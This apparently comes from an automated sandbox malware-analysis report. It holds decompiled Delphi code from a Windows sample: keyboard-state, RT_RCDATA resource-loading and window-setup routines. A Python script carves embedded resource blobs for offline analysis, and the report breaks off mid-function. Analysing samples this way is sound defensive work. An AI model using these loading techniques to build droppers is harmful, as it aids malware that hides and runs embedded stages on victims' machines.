                                                    0x00000000
                                                    0x0043c22e
                                                    0x0043c23d
                                                    0x0043c242
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c242
                                                    0x0043c220
                                                    0x0043c38d

                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0043C331
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardState
                                                    • String ID:
                                                    • API String ID: 1724228437-0
                                                    • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                    • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                    • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                    • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 39%
                                                    			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) { // loads a named RT_RCDATA resource from this module; the interesting artefact is the resource contents, not this loader
                                                    				char _v8;
                                                    				void* __ecx;
                                                    				CHAR* _t11;
                                                    				struct HINSTANCE__* _t12;
                                                    				struct HRSRC__* _t13;
                                                    				void* _t29;
                                                    				intOrPtr* _t33;
                                                    				struct HINSTANCE__* _t37;
                                                    				void* _t38;
                                                    				intOrPtr _t41;
                                                    				void* _t48;
                                                    				intOrPtr _t51;
                                                    
                                                    				_t48 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				_push(_t51);
                                                    				_push(0x474878);            // handler address for the try/finally frame below
                                                    				_push( *[fs:eax]);          // save the previous SEH record (fs:[0])
                                                    				 *[fs:eax] = _t51;           // install the new frame (Delphi-style exception frame)
                                                    				_t11 = E00404E80(_v8);      // helper body not in the listing; its result is used as the CHAR* resource name
                                                    				_t12 =  *0x49e668; // 0x400000, the module handle (image base)
                                                    				_t13 = FindResourceA(_t12, _t11, 0xa); // executed; type 0xa = RT_RCDATA: a raw data resource looked up by name
                                                    				if(_t13 == 0) {
                                                    					E00404A14(_t48, 0x47488c);  // resource absent: error path, no further use of the name
                                                    				} else {
                                                    					_t37 =  *0x49e668; // 0x400000
                                                    					_t33 = E0041E0D0(_t37, 1, 0xa, _v8); // opens the resource with the same (module, RT_RCDATA, name) triple; the pattern matches a Delphi TResourceStream construction
                                                    					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
                                                    					_push( *((intOrPtr*)( *_t33))());
                                                    					_t29 = E00404ED8(_t48);
                                                    					_pop(_t38);
                                                    					L0041D8CC(_t33, _t38, _t29);
                                                    				}
                                                    				_pop(_t41);
                                                    				 *[fs:eax] = _t41;
                                                    				_push(0x47487f);
                                                    				return E004049C0( &_v8);
                                                    			}
                                                    Line addresses for the statement lines of E004747D8, in order:
                                                    0x004747de 0x004747e0 0x004747e6 0x004747ed 0x004747ee 0x004747f3 0x004747f6 0x004747fe
                                                    0x00474804 0x0047480a 0x00474811 0x0047485d 0x00474813 0x00474819 0x0047482b 0x00474837
                                                    0x00474842 0x00474845 0x0047484e 0x0047484f 0x0047484f 0x00474864 0x00474867 0x0047486a
                                                    0x00474877

                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindResource
                                                    • String ID:
                                                    • API String ID: 1635176832-0
                                                    • Opcode ID: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                    • Instruction ID: 3aff7a426593e0292f2699da8adb463acbb462f0eeeb319a78e6b77317a5089b
                                                    • Opcode Fuzzy Hash: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                    • Instruction Fuzzy Hash: 7B117074700204AFD300FBAADC5296AB3EDFB89714B51807AF508E7291DB39DD01875A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
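E004747D8 above resolves a resource of type 0xa (RT_RCDATA) by name, which is where a dropper typically keeps its embedded stage. The walker below is an added example, not code from this report or from the sample: it parses an IMAGE_RESOURCE_DIRECTORY tree the way the loader does behind FindResourceA and returns the RT_RCDATA blob by name, so the same lookup can be replayed on disk without running the file. The `.rsrc` bytes it parses are constructed inline; `build_sample_rsrc`, `find_rcdata`, the resource name `PAYLOAD` and the section RVA 0x6000 are assumptions for the demonstration.

```python
import struct

RT_ICON = 3
RT_RCDATA = 10          # the 0xa passed to FindResourceA above
SUBDIR = 0x80000000     # high bit: entry points at another directory / a name string


def _dir_entries(blob, off):
    """Parse one IMAGE_RESOURCE_DIRECTORY at `off` (16-byte header followed by
    8-byte entries, named entries first) into (name_or_id, offset) pairs."""
    _chars, _stamp, _major, _minor, n_named, n_id = struct.unpack_from("<IIHHHH", blob, off)
    pos = off + 16
    entries = []
    for _ in range(n_named + n_id):
        entries.append(struct.unpack_from("<II", blob, pos))
        pos += 8
    return entries


def _entry_name(blob, ident):
    """High bit set: offset to a length-prefixed UTF-16LE name; else a numeric ID."""
    if ident & SUBDIR:
        off = ident & 0x7FFFFFFF
        (length,) = struct.unpack_from("<H", blob, off)
        return blob[off + 2:off + 2 + 2 * length].decode("utf-16-le")
    return ident


def iter_resources(rsrc, section_rva):
    """Walk the type -> name -> language tree of a raw .rsrc section and yield
    (type, name, lang, data) for every leaf. `section_rva` is the section's
    VirtualAddress, needed because leaf OffsetToData fields hold RVAs."""
    for t_ident, t_off in _dir_entries(rsrc, 0):
        for n_ident, n_off in _dir_entries(rsrc, t_off & 0x7FFFFFFF):
            for l_ident, l_off in _dir_entries(rsrc, n_off & 0x7FFFFFFF):
                if l_off & SUBDIR:
                    raise ValueError("unexpected fourth directory level")
                rva, size, _codepage, _reserved = struct.unpack_from("<IIII", rsrc, l_off)
                start = rva - section_rva
                if start < 0 or start + size > len(rsrc):
                    raise ValueError("resource data lies outside the .rsrc section")
                yield (_entry_name(rsrc, t_ident), _entry_name(rsrc, n_ident),
                       _entry_name(rsrc, l_ident), rsrc[start:start + size])


def find_rcdata(rsrc, section_rva, name):
    """What FindResourceA(hModule, name, RT_RCDATA) + LoadResource/LockResource
    resolve to: the first RT_RCDATA blob whose string name matches, compared
    case-insensitively as the Win32 loader does; None when absent."""
    for rtype, rname, _lang, data in iter_resources(rsrc, section_rva):
        if rtype == RT_RCDATA and isinstance(rname, str) and rname.upper() == name.upper():
            return data
    return None


def _directory(n_named, n_id, entries):
    hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id)
    return hdr + b"".join(struct.pack("<II", i, o) for i, o in entries)


def build_sample_rsrc(section_rva=0x6000):
    """Constructed .rsrc section (assumption, not data from the sample): one
    RT_ICON (id 1) and one RT_RCDATA named PAYLOAD, both language 0x409.
    Offsets are laid out by hand and are relative to the section start."""
    icon = b"\x00\x00\x01\x00"
    payload = b"MZ\x90\x00" + b"constructed-embedded-blob"
    blob = bytearray(0xF0 + len(payload))
    blob[0x00:0x20] = _directory(0, 2, [(RT_ICON, SUBDIR | 0x20), (RT_RCDATA, SUBDIR | 0x40)])
    blob[0x20:0x38] = _directory(0, 1, [(1, SUBDIR | 0x60)])              # RT_ICON -> id 1
    blob[0x40:0x58] = _directory(1, 0, [(SUBDIR | 0xA0, SUBDIR | 0x80)])  # RT_RCDATA -> name at 0xA0
    blob[0x60:0x78] = _directory(0, 1, [(0x409, 0xC0)])                   # icon lang -> data entry
    blob[0x80:0x98] = _directory(0, 1, [(0x409, 0xD0)])                   # payload lang -> data entry
    name = "PAYLOAD".encode("utf-16-le")
    blob[0xA0:0xA2 + len(name)] = struct.pack("<H", len(name) // 2) + name
    blob[0xC0:0xD0] = struct.pack("<IIII", section_rva + 0xE0, len(icon), 0, 0)
    blob[0xD0:0xE0] = struct.pack("<IIII", section_rva + 0xF0, len(payload), 0, 0)
    blob[0xE0:0xE0 + len(icon)] = icon
    blob[0xF0:] = payload
    return bytes(blob)


if __name__ == "__main__":
    rsrc = build_sample_rsrc()
    for rtype, rname, lang, data in iter_resources(rsrc, 0x6000):
        print(rtype, rname, hex(lang), len(data), data[:4])
    print(find_rcdata(rsrc, 0x6000, "payload"))
```

On a real sample, feed `iter_resources` the raw bytes of the `.rsrc` section and that section's VirtualAddress (with pefile, `section.get_data()` and `section.VirtualAddress`); any RT_RCDATA leaf that starts with `MZ`, or has entropy close to 8 bits per byte, is the blob to carve and analyse next. The bounds check on the leaf RVA matters in practice, since packed samples sometimes carry truncated or deliberately broken resource trees that crash naive parsers.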

                                                    C-Code - Quality: 37%
                                                    			E004598AC(intOrPtr _a4) {
                                                    				intOrPtr _t26;
                                                    
                                                    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));   // lParam  (message record: Msg +0, WParam +4, LParam +8, Result +0xc)
                                                    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));   // wParam
                                                    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));       // message id
                                                    				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)); // window handle read from the owning object; likely the same +0x30 slot E004593B4 fills
                                                    				_push(_t26); // executed
                                                    				L00407540(); // executed, resolves to DefWindowProcA (see APIs below): unhandled messages get default processing
                                                    				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26; // store the call's result back into the message record
                                                    				return _t26;
                                                    			}
                                                    Line addresses for the statement lines of E004598AC, in order:
                                                    0x004598b8 0x004598c2 0x004598cb 0x004598d2 0x004598d5 0x004598d6 0x004598e1 0x004598e5

                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                    • Instruction ID: 5377867823ed044e1de45f701f66450d20e8ba5618c1584b6e86b1986842862f
                                                    • Opcode Fuzzy Hash: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                    • Instruction Fuzzy Hash: E6F0C579605608AFCB40DF9DC588D8AFBE8BB4C264B159195B988CB721D234FD808F90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 42%
                                                    			E004593B4(void* __eax, void* __ebx, void* __ecx) { // class registration, GWL_WNDPROC thunk, WM_SETICON/GCL_HICON, then stripping SC_MAXIMIZE/SC_SIZE/SC_MINIMIZE from the system menu: this sequence matches Delphi VCL TApplication.CreateHandle, i.e. framework code rather than sample-specific logic
                                                    				struct _WNDCLASSA _v44;
                                                    				char _v48;
                                                    				char* _t22;
                                                    				long _t23;
                                                    				CHAR* _t26;
                                                    				struct HINSTANCE__* _t27;
                                                    				intOrPtr* _t29;
                                                    				signed int _t32;
                                                    				intOrPtr* _t33;
                                                    				signed int _t36;
                                                    				struct HINSTANCE__* _t37;
                                                    				void* _t39;
                                                    				CHAR* _t40;
                                                    				struct HWND__* _t41;
                                                    				char* _t47;
                                                    				char* _t52;
                                                    				long _t55;
                                                    				long _t59;
                                                    				struct HINSTANCE__* _t62;
                                                    				intOrPtr _t64;
                                                    				void* _t69;
                                                    				struct HMENU__* _t70;
                                                    				intOrPtr _t77;
                                                    				void* _t83;
                                                    				short _t88;
                                                    
                                                    				_v48 = 0;
                                                    				_t69 = __eax;
                                                    				_push(_t83);
                                                    				_push(0x459555);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t83 + 0xffffffd4;
                                                    				if( *((char*)(__eax + 0xa4)) != 0) {
                                                    					L13:
                                                    					_pop(_t77);
                                                    					 *[fs:eax] = _t77;
                                                    					_push(0x45955c);
                                                    					return E004049C0( &_v48);
                                                    				}
                                                    				_t22 =  *0x49dc84; // 0x49e04c
                                                    				if( *_t22 != 0) {
                                                    					goto L13;
                                                    				}
                                                    				_t23 = E00422BCC(E00459934, __eax); // executed; builds a window-procedure thunk in memory allocated PAGE_EXECUTE_READWRITE (VirtualAlloc ..., 0x40 in the APIs below), the stock VCL MakeObjectInstance pattern, not injection by itself
                                                    				 *(_t69 + 0x40) = _t23;            // thunk pointer kept in the object and installed as GWL_WNDPROC below
                                                    				 *0x49bf54 = L00407540;            // default window procedure for the class being registered
                                                    				_t26 =  *0x49bf74; // 0x45909c
                                                    				_t27 =  *0x49e668; // 0x400000
                                                    				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
                                                    					_t62 =  *0x49e668; // 0x400000
                                                    					 *0x49bf60 = _t62;
                                                    					_t88 = RegisterClassA(0x49bf50);
                                                    					if(_t88 == 0) {
                                                    						_t64 =  *0x49d7fc; // 0x422f20
                                                    						E00406A70(_t64,  &_v48);
                                                    						E0040D144(_v48, 1);
                                                    						E00404378();
                                                    					}
                                                    				}
                                                    				_t29 =  *0x49d970; // 0x49e900
                                                    				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;      // indirect call with 0, result halved; in CreateHandle this is GetSystemMetrics(SM_CXSCREEN) div 2
                                                    				if(_t88 < 0) {                                // decompiler rendering of "sar / jns / adc eax,0" (signed div 2); _t88 is a stale register here, not a real condition
                                                    					asm("adc eax, 0x0");
                                                    				}
                                                    				_t33 =  *0x49d970; // 0x49e900
                                                    				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1; // same call with 1 (SM_CYSCREEN), halved
                                                    				if(_t88 < 0) {
                                                    					asm("adc eax, 0x0");
                                                    				}
                                                    				_push(_t36);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_t37 =  *0x49e668; // 0x400000
                                                    				_push(_t37);
                                                    				_push(0);
                                                    				_t7 = _t69 + 0x8c; // 0x96000045
                                                    				_t39 = E00404E80( *_t7);
                                                    				_t40 =  *0x49bf74; // 0x45909c, executed: window class name
                                                    				_t41 = E00407AE4(_t40, _t39); // executed; creates the window (class name, title from the object's +0x8c string, the pushed style/position arguments) and returns its HWND
                                                    				 *(_t69 + 0x30) = _t41;       // HWND slot used by every USER32 call below
                                                    				_t9 = _t69 + 0x8c; // 0x45150c
                                                    				E004049C0(_t9);
                                                    				 *((char*)(_t69 + 0xa4)) = 1;
                                                    				_t11 = _t69 + 0x40; // 0x10940000
                                                    				_t12 = _t69 + 0x30; // 0xe
                                                    				SetWindowLongA( *_t12, 0xfffffffc,  *_t11); // GWL_WNDPROC (-4): route the window's messages through the RWX thunk from E00422BCC
                                                    				_t47 =  *0x49da40; // 0x49eb1c
                                                    				if( *_t47 != 0) {
                                                    					_t55 = E0045A038(_t69);
                                                    					_t13 = _t69 + 0x30; // 0xe
                                                    					SendMessageA( *_t13, 0x80, 1, _t55); // executed; WM_SETICON (0x80), ICON_BIG (1)
                                                    					_t59 = E0045A038(_t69);
                                                    					_t14 = _t69 + 0x30; // 0xe
                                                    					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed; GCL_HICON (-14)
                                                    				}
                                                    				_t15 = _t69 + 0x30; // 0xe
                                                    				_t70 = GetSystemMenu( *_t15, "true"); // the "true" literal is a decompiler artefact; the APIs list below shows bRevert = 0
                                                    				DeleteMenu(_t70, 0xf030, 0);          // SC_MAXIMIZE, MF_BYCOMMAND
                                                    				DeleteMenu(_t70, 0xf000, 0);          // SC_SIZE
                                                    				_t52 =  *0x49da40; // 0x49eb1c
                                                    				if( *_t52 != 0) {
                                                    					DeleteMenu(_t70, 0xf010, 0);      // SC_MINIMIZE
                                                    				}
                                                    				goto L13;
                                                    			}
                                                    Line addresses for the statement lines of E004593B4, in order (0x00000000 marks a line with no address):
                                                    0x004593bd 0x004593c0 0x004593c4 0x004593c5 0x004593ca 0x004593cd 0x004593d7 0x0045953f
                                                    0x00459541 0x00459544 0x00459547 0x00459554 0x00459554 0x004593dd 0x004593e5 0x00000000
                                                    0x00000000 0x004593f1 0x004593f6 0x004593fe 0x00459407 0x0045940d 0x0045941a 0x0045941c
                                                    0x00459421 0x00459430 0x00459433 0x00459438 0x0045943d 0x0045944c 0x00459451 0x00459451
                                                    0x00459433 0x00459458 0x00459461 0x00459463 0x00459465 0x00459465 0x0045946b 0x00459474
                                                    0x00459476 0x00459478 0x00459478 0x0045947b 0x0045947c 0x0045947e 0x00459480 0x00459482
                                                    0x00459484 0x00459489 0x0045948a 0x0045948c 0x00459492 0x0045949e 0x004594a3 0x004594a8
                                                    0x004594ab 0x004594b1 0x004594b6 0x004594bd 0x004594c3 0x004594c7 0x004594cc 0x004594d4
                                                    0x004594d8 0x004594e5 0x004594e9 0x004594f0 0x004594f8 0x004594fc 0x004594fc 0x00459503
                                                    0x0045950c 0x00459516 0x00459523 0x00459528 0x00459530 0x0045953a 0x0045953a 0x00000000

                                                    APIs
                                                      • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                    • GetClassInfoA.USER32 ref: 00459413
                                                    • RegisterClassA.USER32 ref: 0045942B
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 004594C7
                                                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004594E9
                                                    • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                    • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                    • String ID: /B$@u@$LI
                                                    • API String ID: 2103932818-2136969242
                                                    • Opcode ID: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                    • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                    • Opcode Fuzzy Hash: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                    • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 86%
                                                    			E00446330(void* __ebx, void* __edi, void* __eflags) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				long _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				intOrPtr _t25;
                                                    				short _t27;
                                                    				char _t29;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t38;
                                                    				intOrPtr _t47;
                                                    				intOrPtr _t49;
                                                    				intOrPtr* _t50;
                                                    				intOrPtr _t53;
                                                    				struct HINSTANCE__* _t63;
                                                    				intOrPtr* _t78;
                                                    				intOrPtr* _t80;
                                                    				intOrPtr _t83;
                                                    				void* _t87;
                                                    
                                                    				_v20 = 0;
                                                    				_v8 = 0;
                                                    				_push(_t87);
                                                    				_push(0x4464a8);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t87 + 0xffffffe0;
                                                    				_v16 = GetCurrentProcessId();
                                                    				_v12 = 0;
                                                    				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
                                                    				E00404A14(0x49eb28, _v8);
                                                    				_t25 =  *0x49eb28; // 0x0
                                                    				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
                                                    				 *0x49eb24 = _t27;
                                                    				_t29 =  *0x49e668; // 0x400000
                                                    				_v36 = _t29;
                                                    				_v32 = 0;
                                                    				_v28 = GetCurrentThreadId();
                                                    				_v24 = 0;
                                                    				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                    				E00404A14(0x49eb2c, _v20);
                                                    				_t35 =  *0x49eb2c; // 0x0
                                                    				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
                                                    				_t38 =  *0x49eb2c; // 0x0
                                                    				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
                                                    				 *0x49eb68 = E0041AF14(1);
                                                    				L00445F34();
                                                    				 *0x49eb18 = L00445D5C(1, 1);
                                                    				_t47 = E00457FC8(1, __edi);
                                                    				_t78 =  *0x49de0c; // 0x49ebbc
                                                    				 *_t78 = _t47;
                                                    				_t49 = E004590AC(0, 1);
                                                    				_t80 =  *0x49dbcc; // 0x49ebb8
                                                    				 *_t80 = _t49;
                                                    				_t50 =  *0x49dbcc; // 0x49ebb8
                                                    				E0045AD24( *_t50, 1);
                                                    				_t53 =  *0x435da8; // 0x435dac
                                                    				E0041A634(_t53, 0x43807c, 0x43808c);
                                                    				_t63 = GetModuleHandleA("USER32");
                                                    				if(_t63 != 0) {
                                                    					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
                                                    				}
                                                    				_pop(_t83);
                                                    				 *[fs:eax] = _t83;
                                                    				_push(0x4464af);
                                                    				E004049C0( &_v20);
                                                    				return E004049C0( &_v8);
                                                    			}
                                                    Instruction addresses (one per decompiled line, spilled from the side-by-side listing): 0x00446339 to 0x004464a7

                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                    • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                    • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                    • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                    • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                      • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                      • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                      • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                      • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                      • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                      • Part of subcall function 00457FC8: GetKeyboardLayout.USER32 ref: 0045800D
                                                      • Part of subcall function 00457FC8: GetDC.USER32(00000000), ref: 00458062
                                                      • Part of subcall function 00457FC8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045806C
                                                      • Part of subcall function 00457FC8: ReleaseDC.USER32 ref: 00458077
                                                      • Part of subcall function 004590AC: LoadIconA.USER32 ref: 00459191
                                                      • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                      • Part of subcall function 004590AC: OemToCharA.USER32 ref: 004591D6
                                                      • Part of subcall function 004590AC: CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000), ref: 00459216
                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
                                                    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                    • API String ID: 2984857458-974380857
                                                    • Opcode ID: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                    • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                    • Opcode Fuzzy Hash: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                    • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 84%
                                                    			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                                    				char _v68;
                                                    				struct _WNDCLASSA _v108;
                                                    				intOrPtr _v116;
                                                    				signed char _v137;
                                                    				void* _v144;
                                                    				struct _WNDCLASSA _v184;
                                                    				char _v188;
                                                    				char _v192;
                                                    				char _v196;
                                                    				int _t52;
                                                    				void* _t53;
                                                    				intOrPtr _t86;
                                                    				intOrPtr _t104;
                                                    				intOrPtr _t108;
                                                    				void* _t109;
                                                    				intOrPtr* _t111;
                                                    				void* _t115;
                                                    
                                                    				_t109 = __edi;
                                                    				_t94 = __ebx;
                                                    				_push(__ebx);
                                                    				_v196 = 0;
                                                    				_t111 = __eax;
                                                    				_push(_t115);
                                                    				_push(0x43e87d);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t115 + 0xffffff40;
                                                    				_t95 =  *__eax;
                                                    				 *((intOrPtr*)( *__eax + 0x98))();
                                                    				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                                    					L7:
                                                    					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
                                                    					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                                    					asm("sbb eax, eax");
                                                    					_t53 = _t52 + 1;
                                                    					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
                                                    						if(_t53 != 0) {
                                                    							UnregisterClassA( &_v68, _v108.hInstance);
                                                    						}
                                                    						_v108.lpfnWndProc = E00437D70;
                                                    						_v108.lpszClassName =  &_v68;
                                                    						if(RegisterClassA( &_v108) == 0) {
                                                    							E0040E79C(_t94, _t95, _t109, _t111);
                                                    						}
                                                    					}
                                                    					 *0x49bc20 = _t111;
                                                    					_t96 =  *_t111; // executed
                                                    					 *((intOrPtr*)( *_t111 + 0x9c))();
                                                    					if( *(_t111 + 0x180) == 0) {
                                                    						E0040E79C(_t94, _t96, _t109, _t111);
                                                    					}
                                                    					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
                                                    						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
                                                    					}
